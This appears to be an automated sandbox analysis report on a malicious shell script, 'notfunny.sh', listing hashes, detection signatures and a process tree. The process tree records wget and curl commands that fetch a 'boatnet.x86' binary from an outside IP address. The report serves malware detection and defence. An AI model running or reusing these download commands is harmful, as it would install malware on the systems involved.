Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
  • submitted
    28/10/2024, 01:18

General

  • Target

    notfunny.sh

  • Size

    3KB

  • MD5

    fc73d6be8e91e575c902e5d3b1834868

  • SHA1

    61880a4da8b19dc7d4d87b5a3d55e0a992aac856

  • SHA256

    9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

  • SHA512

    1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3

Score
5/10

Malware Config

Signatures

  • UPX packed file (1 IoC)

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information (1 IoC)

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory (2 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/notfunny.sh
    /tmp/notfunny.sh
    1⤵
      PID:704
      • /usr/bin/wget
        wget http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Writes file to tmp directory
        PID:708
      • /usr/bin/curl
        curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:809

    Network

    MITRE ATT&CK Matrix

    Downloads

    • /tmp/boatnet.x86

      Filesize

      30KB

      MD5

      8833728bd41c20fb14e6075a9cdd8afc

      SHA1

      9733c8e51ed6c6a349cfadaf9bfc58aa5222feaa

      SHA256

      ff2f19e0d279d3c53e6c154790dbaaeccb8d5664399d68ba4c44bdd3405c8671

      SHA512

      58fe870f0f8b470c70a843e44f603478ac368406a947a1fb46230577179357c633168dd63071ca6ca0365d553972decddc13264ac35fa2d4632c82b4d414ce48